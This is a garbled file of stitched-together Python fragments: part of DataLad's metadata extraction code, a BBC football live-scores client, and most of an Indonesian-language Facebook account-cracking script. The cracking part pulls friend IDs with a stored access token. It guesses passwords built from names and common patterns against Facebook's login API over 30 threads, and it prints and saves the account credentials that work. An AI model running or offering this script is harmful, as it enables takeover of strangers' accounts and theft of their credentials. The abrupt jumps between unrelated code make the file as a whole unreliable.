sources = ['metalad_core', 'metalad_annex'] \
+ assure_list(get_metadata_type(ds))
# keep local, who knows what some extractors might pull in
from pkg_resources import iter_entry_points # delayed heavy import
extractors = {}
for ep in iter_entry_points('datalad.metadata.extractors'):
if ep.name not in sources:
# not needed here
continue
rec = dict(entrypoint=ep)
if ep.name in extractors: # pragma: no cover
# potential conflict
if extractors[ep.name]['entrypoint'].dist.project_name == 'datalad':
# this is OK, just state it is happening
lgr.debug(
'Extractor %s overrides datalad-core variant', ep)
extractors[ep.name] = rec
elif ep.dist.project_name == 'datalad':
# also OK
lgr.debug(
'Prefer extractor %s over datalad-core variant', ep)
else:
msg = (
'At least two DataLad extensions provide metadata '
'extractor %s: %s vs. %s',
ep.name,
ep.dist,
                        extractors[ep.name]['entrypoint'].dist)
if ep.name in sources:
# this extractor is required -> blow hard
raise RuntimeError(msg[0] % msg[1:])
else:
# still moan
                        lgr.warning(*msg)
# ignore the newcomer, is listed second in sys.path
else:
# this fresh and unique
extractors[ep.name] = rec
for msrc in sources:
if msrc not in extractors:
                # we said that we want to fail, rather than just moan about
# less metadata
raise ValueError(
"Enabled metadata extractor '{}' not available".format(msrc),
)
# load extractor implementation
rec = extractors[msrc]
rec['process_type'] = process_type \
if process_type and not process_type == 'extractors' \
else ds.config.obtain(
'datalad.metadata.extract-from-{}'.format(
msrc.replace('_', '-')),
default='all')
# load the extractor class, no instantiation yet
try:
rec['class'] = rec['entrypoint'].load()
except Exception as e: # pragma: no cover
msg = ('Failed %s metadata extraction from %s: %s',
msrc, ds, exc_str(e))
log_progress(lgr.error, 'metadataextractors', *msg)
raise ValueError(msg[0] % msg[1:])
res_props = dict(
action='meta_extract',
logger=lgr,
)
# build report on extractors and their state info
if process_type == 'extractors':
for ename, eprops in iteritems(extractors):
state = {}
# do not trip over old extractors
if hasattr(eprops['class'], 'get_state'):
state.update(eprops['class']().get_state(ds))
yield dict(
action='meta_extract',
path=ds.path,
status='ok',
logger=lgr,
extractor=ename,
state=dict(
state,
process_type=eprops['process_type'],
)
)
return
# build a representation of the dataset's content (incl subds
# records)
# go through a high-level command (not just the repo methods) to
# get all the checks and sanitization of input arguments
# this call is relatively expensive, but already anticipates
# demand for information by our core extractors that always run
# unconditionally, hence no real slowdown here
# TODO this could be a dict, but MIH cannot think of an access
# pattern that does not involve iteration over all items
status = []
exclude_paths = [
ds.pathobj / PurePosixPath(e)
for e in (
list(exclude_from_metadata) + assure_list(
ds.config.get('datalad.metadata.exclude-path', []))
)
]
if ds.is_installed():
# we can make use of status
res_props.update(refds=ds.path)
for r in ds.status(
# let status sort out all path arg handling
# but this will likely make it impossible to use this
# command to just process an individual file independent
# of a dataset
path=path,
# it is safe to ask for annex info even when a dataset is
# plain Git
# NOTE changing to 'annex=availability' has substantial
# performance costs, as it involved resolving each annex
# symlink on the file-system, which can be really slow
# depending on the FS and the number of annexed files
annex='basic',
# TODO we never want to aggregate metadata from untracked
# content, but we might just want to see what we can get
# from a file
untracked='no',
# this command cannot and will not work recursively
recursive=False,
result_renderer='disabled'):
# path reports are always absolute and anchored on the dataset
# (no repo) path
p = Path(r['path'])
if p in exclude_paths or \
any(e in p.parents for e in exclude_paths):
# this needs to be ignore for any further processing
continue
# strip useless context information
status.append(
{k: v for k, v in iteritems(r)
if (k not in ('refds', 'parentds', 'action', 'status')
and not k.startswith('prev_'))})
# determine the commit that we are describing
refcommit = get_refcommit(ds)
if refcommit is None or not len(status):
# this seems extreme, but without a single commit there is
            # nothing
from datetime import datetime
from itertools import groupby
import json
import requests
from .base import matchcommon
from .exceptions import FSConnectionError
from .matchdict import MatchDict
from .matchdict import MatchDictKeys as MDKey
from .matchevent import MatchEvent
from .playeraction import PlayerAction
from .utils import UTC
from .morphlinks import ML
# dateutil is not part of the standard library so let's see if we can import
# and set a flag showing success or otherwise
try:
import dateutil.parser
HAS_DATEUTIL = True
except ImportError:
HAS_DATEUTIL = False
# We need a UTC timezone to do some datetime manipulations
TZ_UTZ = UTC()
API_BASE = "http://push.api.bbci.co.uk"
class FootballMatch(matchcommon):
'''Class for getting details of individual football matches.
Data is pulled from BBC live scores page.
'''
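    # Typical usage (requires network access; the team name is illustrative,
    # and HomeTeam/HomeScore etc. are properties defined further down this
    # class):
    #   match = FootballMatch("Liverpool")
    #   if match:
    #       print(match.HomeTeam, match.HomeScore,
    #             match.AwayScore, match.AwayTeam)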
scoreslink = ("/proxy/data/bbc-morph-football-scores-match-list-data/"
"endDate/{end_date}/startDate/{start_date}/{source}/"
"version/2.4.0/withPlayerActions/{detailed}")
detailprefix = ("http://www.bbc.co.uk/sport/football/live/"
"partial/{id}")
match_format = {"%H": "HomeTeam",
"%A": "AwayTeam",
"%h": "HomeScore",
"%a": "AwayScore",
"%v": "Venue",
"%T": "DisplayTime",
"%S": "Status",
"%R": "HomeRedCards",
"%r": "AwayRedCards",
"%G": "HomeScorerText",
"%g": "AwayScorerText",
"%C": "Competition"}
ACTION_GOAL = "goal"
ACTION_RED_CARD = "red-card"
ACTION_YELLOW_RED_CARD = "yellow-red-card"
STATUS_HALF_TIME = "HALFTIME"
STATUS_FULL_TIME = "FULLTIME"
STATUS_FIXTURE = "FIXTURE"
STATUS_ET_FIRST_HALF = "EXTRATIMEFIRSTHALF"
STATUS_ET_HALF_TIME = "EXTRATIMEHALFTIME"
def __init__(self, team, detailed=True, data=None, on_goal=None,
on_red=None, on_status_change=None, on_new_match=None,
matchdate=None, events_on_first_run=False):
'''Creates an instance of the Match object.
Must be created by passing the name of one team.
        data - The user can also pass data to the class, e.g. if multiple
        instances of the class are being run, thereby saving HTTP requests.
        Otherwise the class handles the request on its own.
detailed - Do we want additional data (e.g. goal scorers, bookings)?
'''
super(FootballMatch, self).__init__()
self.detailed = detailed
self.myteam = team
self.match = MatchDict()
self._matchdate = self._check_match_date(matchdate)
self._on_red = on_red
self._on_goal = on_goal
self._on_status_change = on_status_change
self._on_new_match = on_new_match
self._clearFlags()
if data is None:
self.hasTeamPage = self._findTeamPage()
if not self.hasTeamPage:
data = self._scanLeagues()
else:
self.update(first_run=events_on_first_run)
if data:
self.update(data=data, first_run=events_on_first_run)
def __nonzero__(self):
return bool(self.match)
def __bool__(self):
return self.__nonzero__()
def __repr__(self):
return "<FootballMatch(\'%s\')>" % (self.myteam)
def __eq__(self, other):
if isinstance(other, self.__class__):
try:
return self.match.eventKey == other.match.eventKey
except AttributeError:
return self.myteam == other.myteam
else:
return False
# Semi-hidden methods, only meant to be called by other class methods
def _no_match(default):
"""
Decorator to provide default values for properties when there is no
match found.
e.g.:
@property
@_no_match(str())
def HomeTeam(self):
...
"""
def wrapper(func):
def wrapped(self):
if self.match:
return func(self)
else:
return default
return wrapped
return wrapper
def _override_none(value):
"""
Decorator to provide default values for properties when there is no
current value.
For example, this decorator can be used to convert a None value for a
match score (empty before the match starts) to 0.
e.g.:
@property
@_no_match(int())
@_override_none(0)
def HomeScore(self):
...
"""
def wrapper(func):
def wrapped(self):
if func(self) is None:
return value
else:
return func(self)
return wrapped
return wrapper
def _dump(self, filename):
c = {k: v for k, v in self.match.iteritems() if k != "_callbacks"}
with open(filename, "w") as f:
json.dump(c, f, indent=4)
def _request(self, url):
url = API_BASE + url
try:
r = requests.get(url)
except (requests.exceptions.ConnectionError,
requests.exceptions.Timeout):
raise FSConnectionError
if r.status_code == 200:
return r.json()
else:
return dict()
def _check_match_date(self, matchdate):
if matchdate is None:
return None
try:
datetime.strptime(matchdate, "%Y-%m-%d")
return matchdate
except (ValueError, TypeError):
raise ValueError("Invalid match date. "
"Match date format must by YYYY-MM-DD.")
def _canUpdate(self):
return self.hasTeamPage
def _scanLeagues(self):
raw = self._getScoresFixtures(source=ML.MORPH_FIXTURES_ALL)
comps = raw.get("matchData", None)
if not comps:
            return None
for comp in comps:
matches = list(comp["tournamentDatesWithEvents"].values())[0][0]
matches = matches["events"]
for m in matches:
if self.checkTeamInMatch(m):
return m
return None
def checkTeamInMatch(self, m):
home = [m["homeTeam"]["name"][x].lower()
for x in ["first", "full", "abbreviation", "last"]
if m["homeTeam"]["name"][x]]
away = [m["awayTeam"]["name"][x].lower()
for x in ["first", "full", "abbreviation", "last"]
if m["awayTeam"]["name"][x]]
return self.myteam.lower() in (home + away)
def _findTeamPage(self):
team = "-".join(self.myteam.lower().split(" "))
teampage = "https://www.bbc.co.uk/sport/football/teams/" + team
validteam = self.checkPage(teampage)
if validteam:
self.myteampage = "team/{}".format(team)
return True
else:
return False
def _getScoresFixtures(self, start_date=None, end_date=None,
source=None, detailed=None):
if start_date is None:
if self._matchdate:
start_date = self._matchdate
else:
start_date = datetime.now().strftime("%Y-%m-%d")
if end_date is None:
if self._matchdate:
end_date = self._matchdate
else:
end_date = datetime.now().strftime("%Y-%m-%d")
if source is None and self.hasTeamPage:
source = self.myteampage
if detailed is None:
detailed = self.detailed
pl = self.scoreslink.format(start_date=start_date,
end_date=end_date,
source=source,
detailed=str(detailed).lower())
return self._request(pl)
def _findMatch(self, payload):
match = payload["matchData"]
if match:
return list(match[0]["tournamentDatesWithEvents"].values())[0][0]["events"][0] # noqa: E501
else:
return None
def _setCallbacks(self):
self.match.add_callback(MDKey.HOME_TEAM, self._checkHomeTeamEvent)
self.match.add_callback(MDKey.AWAY_TEAM, self._checkAwayTeamEvent)
self.match.add_callback(MDKey.PROGRESS, self._checkStatus)
def _getEvents(self, event, event_type):
events = []
player_actions = event.get("playerActions", list())
for acts in player_actions:
# player = acts["name"]["abbreviation"]
for act in acts["actions"]:
if act["type"] == event_type:
pa = PlayerAction(acts, act)
events.append(pa)
return sorted(events)
def _lastEvent(self, event_type, just_home=False, just_away=False):
events = []
if just_home and just_away:
just_home = just_away = False
if not just_away:
events += self._getEvents(self.match.homeTeam, event_type)
if not just_home:
events += self._getEvents(self.match.awayTeam, event_type)
events = sorted(events)
if events:
return events[-1]
else:
return None
def _lastReds(self, just_home=False, just_away=False):
reds = []
red = self._lastEvent(self.ACTION_RED_CARD,
just_home=just_home,
just_away=just_away)
yellow = self._lastEvent(self.ACTION_YELLOW_RED_CARD,
just_home=just_home,
just_away=just_away)
if red:
reds.append(red)
if yellow:
reds.append(yellow)
if reds:
return sorted(reds)[-1]
else:
return None
def _getReds(self, event):
reds = []
reds += self._getEvents(event, self.ACTION_RED_CARD)
reds += self._getEvents(event, self.ACTION_YELLOW_RED_CARD)
return sorted(reds)
def _getGoals(self, event):
return self._getEvents(event, self.ACTION_GOAL)
def _checkGoal(self, old, new):
return ((old.scores.score != new.scores.score)
and (new.scores.score > 0))
def _checkRed(self, old, new):
old_reds = self._getReds(old)
new_reds = self._getReds(new)
return old_reds != new_reds
def _checkHomeTeamEvent(self, event):
self._checkTeamEvent(event, home=True)
def _checkAwayTeamEvent(self, event):
self._checkTeamEvent(event, home=False)
def _checkTeamEvent(self, event, home=True):
if home:
old = self._old.homeTeam
else:
old = self._old.awayTeam
new = MatchDict(event)
goal = self._checkGoal(old, new)
red = self._checkRed(old, new)
if goal:
if home:
self._homegoal = True
else:
self._awaygoal = True
if red:
if home:
self._homered = True
else:
self._awayred = True
def _checkStatus(self, status):
self._statuschange = True
def _clearFlags(self):
self._homegoal = False
self._awaygoal = False
self._homered = False
self._awayred = False
self._statuschange = False
self._matchfound = False
def _fireEvent(self, func, payload):
try:
func(payload)
except TypeError:
pass
def _fireEvents(self):
if self._homegoal:
func = self.on_goal
payload = MatchEvent(MatchEvent.TYPE_GOAL, self, True)
self._fireEvent(func, payload)
if self._awaygoal:
func = self.on_goal
payload = MatchEvent(MatchEvent.TYPE_GOAL, self, False)
self._fireEvent(func, payload)
if self._homered:
func = self.on_red
payload = MatchEvent(MatchEvent.TYPE_RED_CARD, self, True)
self._fireEvent(func, payload)
if self._awayred:
func = self.on_red
payload = MatchEvent(MatchEvent.TYPE_RED_CARD, self, False)
self._fireEvent(func, payload)
if self._statuschange:
func = self.on_status_change
payload = MatchEvent(MatchEvent.TYPE_STATUS, self)
self._fireEvent(func, payload)
if self._matchfound:
func = self.on_new_match
payload = MatchEvent(MatchEvent.TYPE_NEW_MATCH, self)
self._fireEvent(func, payload)
def _groupedEvents(self, events):
def timesort(event):
return (event.ElapsedTime, event.AddedTime)
events = sorted(events, key=lambda x: x.FullName)
events = [list(y) for x, y in groupby(events,
key=lambda x: x.FullName)]
events = sorted(events, key=lambda x: timesort(x[0]))
events = [sorted(x, key=timesort) for x in events]
return events
def _formatEvents(self, events):
events = self._groupedEvents(events)
raw = []
out = u""
for event in events:
name = event[0].AbbreviatedName
times = []
if event[0].isGoal and event[0].isOwnGoal:
name = u"{} (OG)".format(name)
for item in event:
dt = item.DisplayTime
if item.isGoal and item.isPenalty:
dt = u"{} pen".format(dt)
times.append(dt)
raw.append((name, times))
for i, (player, events) in enumerate(raw):
out += player
ev = u" ("
ev += u", ".join(events)
ev += u")"
out += ev
if i < len(raw) - 1:
out += u", "
return out
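# Illustrative result of _formatEvents (player names and times below are
# invented): own goals are tagged "(OG)" and penalties get a " pen" suffix, e.g.
#   u"Rashford (23, 52 pen), Fernandes (OG) (67)"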
def formatText(self, text):
values = {k[1]: getattr(self, v) for k, v in self.match_format.items()}
return text.format(**values)
def formatMatch(self, fmt):
for key in self.match_format:
try:
fmt = fmt.replace(key, getattr(self, self.match_format[key]))
except TypeError:
fmt = fmt.replace(key,
str(getattr(self, self.match_format[key])))
return fmt
def formatTimeToKickOff(self, fmt):
ko = self.TimeToKickOff
if ko is None:
return ""
d = {"d": ko.days}
d["h"], rem = divmod(ko.seconds, 3600)
d["m"], d["s"] = divmod(rem, 60)
d["s"] = int(d["s"])
return fmt.format(**d)
def update(self, data=None, first_run=False):
if data is None and not self._canUpdate():
data = self._scanLeagues()
elif data is None:
rawdata = self._getScoresFixtures()
if rawdata:
match = self._findMatch(rawdata)
else:
match = None
if data:
match = data
if match:
if not self.match:
self.match = MatchDict(match, add_callbacks=True)
self._setCallbacks()
self._old = self.match
self._clearFlags()
self._matchfound = True
if not first_run:
self._fireEvents()
else:
self._clearFlags()
self.match.update(match)
if not first_run:
self._fireEvents()
self._old = self.match
return True
# Need this to clear the match if no data (e.g. next day)
elif match is None and self.match:
self._clearFlags()
self.match = MatchDict()
return True
return False
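# Illustrative usage sketch (not from the original module): the team name,
# callback and format string below are invented examples. Placeholders come
# from ``match_format`` above (e.g. %h = HomeScore, %a = AwayScore,
# %S = Status, %v = Venue), and the class needs network access to the BBC
# endpoints to find a match.
#
#     def celebrate(event):
#         print("GOAL!")
#
#     match = FootballMatch("Chelsea", on_goal=celebrate)
#     if match:
#         print(match.formatMatch("%S: %h-%a at %v"))
#     match.update()  # poll again later; callbacks fire when the data changes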
#
'\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass9
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass9 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass9
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + <PASSWORD>9 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass9 + birthday + subscribers)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;93m+\x1b[1;97m] \x1b[1;97mSelesai ....'
print '\x1b[1;97m[\x1b[1;93m+\x1b[1;97m] \x1b[1;97mTotal \x1b[1;92mOK\x1b[1;97m/\x1b[1;93mCP \x1b[1;97m: \x1b[1;92m' + str(len(oks)) + '\x1b[1;97m/\x1b[1;93m' + str(len(cekpoint))
print '\x1b[1;97m[\x1b[1;93m+\x1b[1;97m] \x1b[1;97mCP file tersimpan : out/ind1.txt'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
raw_input('\x1b[1;93m[\x1b[1;97m Kembali \x1b[1;93m]')
os.system('python2 XXXXX.py')
def bangla():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mToken Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;94m01\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari Daftar Teman'
print '\x1b[1;97m[\x1b[1;94m02\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari ID Publik / Teman'
print '\x1b[1;97m[\x1b[1;94m03\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari File'
print '\x1b[1;97m[\x1b[1;91m00\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Kembali'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
pilih_bangla()
def pilih_bangla():
reak = raw_input('\x1b[1;93m-> \x1b[91m:\x1b[1;92m ')
if reak == '':
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_bangla()
elif reak == '1' or reak == '01':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif reak == '2' or reak == '02':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print ' \x1b[1;94m \xf0\x9f\xa4\xa1 \x1b[1;97mCRACK BANGLADESH / PAKISTAN \x1b[1;94m\xf0\x9f\xa4\xa1 '
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
dok = raw_input('\x1b[1;97m{\x1b[1;94m+\x1b[1;97m} ID Publik / Teman : ')
try:
jok = requests.get('https://graph.facebook.com/' + dok + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;97m{\x1b[1;94m+\x1b[1;97m} Nama : ' + op['name']
except KeyError:
print '\x1b[1;97m[\x1b[1;94m+\x1b[1;97m] ID Publik / Teman Tidak Ada !'
raw_input('\n[ Kembali ]')
bangla()
except requests.exceptions.ConnectionError:
print '[!] Tidak ada koneksi !'
keluar()
r = requests.get('https://graph.facebook.com/' + dok + '/friends?access_token=' + toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif reak == '3' or reak == '03':
os.system('clear')
print logo
try:
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
idlist = raw_input('\x1b[1;97m{\x1b[1;94m?\x1b[1;97m} Nama File : ')
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except KeyError:
print '\x1b[1;97m[!] File Tidak Ada ! '
raw_input('\n\x1b[1;92m[ \x1b[1;97mKembali \x1b[1;92m]')
except IOError:
print '\x1b[1;97m[!] File Tidak Ada !'
raw_input('\n\x1b[1;93m[ \x1b[1;97mKembali \x1b[1;93m]')
bangla()
if reak == '0' or reak == '00':
menu()
else:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_bangla()
print '\x1b[1;97m{\x1b[1;94m+\x1b[1;97m} Total ID : ' + str(len(id))
print '\x1b[1;97m{\x1b[1;94m?\x1b[1;97m} Stop CTRL+Z'
titik = [
'. ',
'.. ',
'... ']
for o in titik:
print '\r\x1b[1;97m{\x1b[1;94m\xe2\x80\xa2\x1b[1;97m} Crack Berjalan ' + o,
sys.stdout.flush()
time.sleep(1)
print '\n\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
def main(arg):
ubd = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/' + ubd + '/?access_token=' + toket)
x = json.loads(a.text)
bos1 = x['first_name'] + '123'
data1 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga1 = json.load(data1)
if 'access_token' in naga1:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos1
oke.append(ubd + bos1)
elif 'www.facebook.com' in naga1['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos1
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos1 + '\n')
cek.close()
cpe.append(ubd + bos1)
else:
bos2 = x['first_name'] + '1234'
data2 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga2 = json.load(data2)
if 'access_token' in naga2:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos2
oke.append(ubd + bos2)
elif 'www.facebook.com' in naga2['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos2
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos2 + '\n')
cek.close()
cpe.append(ubd + bos2)
else:
bos3 = x['first_name'] + '12345'
data3 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga3 = json.load(data3)
if 'access_token' in naga3:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos3
oke.append(ubd + bos3)
elif 'www.facebook.com' in naga3['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos3
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos3 + '\n')
cek.close()
cpe.append(ubd + bos3)
else:
bos4 = '786786'
data4 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga4 = json.load(data4)
if 'access_token' in naga4:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos4
oke.append(ubd + bos4)
elif 'www.facebook.com' in naga4['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos4
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos4 + '\n')
cek.close()
cpe.append(ubd + bos4)
else:
bos5 = x['first_name'] + '786'
data5 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga5 = json.load(data5)
if 'access_token' in naga5:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos5
oke.append(ubd + bos5)
elif 'www.facebook.com' in naga5['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos5
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos5 + '\n')
cek.close()
cpe.append(ubd + bos5)
else:
bos6 = x['last_name'] + '123'
data6 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga6 = json.load(data6)
if 'access_token' in naga6:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos6
oke.append(ubd + bos6)
elif 'www.facebook.com' in naga6['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos6
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos6 + '\n')
cek.close()
cpe.append(ubd + bos6)
else:
bos7 = x['last_name'] + '1234'
data7 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga7 = json.load(data7)
if 'access_token' in naga7:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos7
oke.append(ubd + bos7)
elif 'www.facebook.com' in naga7['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos7
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos7 + '\n')
cek.close()
cpe.append(ubd + bos7)
else:
bos8 = 'Pakistan'
data8 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga8 = json.load(data8)
if 'access_token' in naga8:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos8
oke.append(ubd + bos8)
elif 'www.facebook.com' in naga8['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos8
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos8 + '\n')
cek.close()
cpe.append(ubd + bos8)
else:
bos9 = x['last_name'] + '786'
data9 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga9 = json.load(data9)
if 'access_token' in naga9:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x9d\x82 ' + bos9
oke.append(ubd + bos9)
elif 'www.facebook.com' in naga9['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x9d\x82 ' + bos9
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos9 + '\n')
cek.close()
cpe.append(ubd + bos9)
else:
bos10 = x['last_name'] + '12345'
